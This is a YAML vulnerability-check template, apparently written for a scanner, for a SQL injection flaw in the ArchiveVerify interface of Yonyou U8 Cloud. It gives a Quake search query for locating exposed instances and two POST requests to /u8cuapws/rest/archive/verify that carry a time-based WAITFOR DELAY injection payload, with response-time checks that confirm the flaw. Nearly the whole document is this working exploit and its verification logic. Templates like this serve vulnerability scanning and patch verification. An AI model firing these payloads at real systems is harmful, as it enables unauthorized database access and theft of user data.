product: 用友U8-Cloud
vName: 用友U8 Cloud ArchiveVerify接口SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友U8 Cloud ArchiveVerify接口处存在SQL注入漏洞，未授权的攻击者可通过此漏洞获取数据库权限，从而盗取用户数据，造成用户信息泄漏。
version: ''
note: ''
search:
  Quake: app:"用友-U8-Cloud"
protocol: http
link: https://download.csdn.net/blog/column/12563359/136339314
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /u8cuapws/rest/archive/verify
      data: '{"orgInfo":{"code":"1'';WAITFOR DELAY ''0:0:5''--"}}'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: '>='
            num: 5
  - exp:
      method: post
      follow: false
      path: /u8cuapws/rest/archive/verify
      data: '{"orgInfo":{"code":"1'';WAITFOR DELAY ''0:0:0''--"}}'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: <=
            num: 3
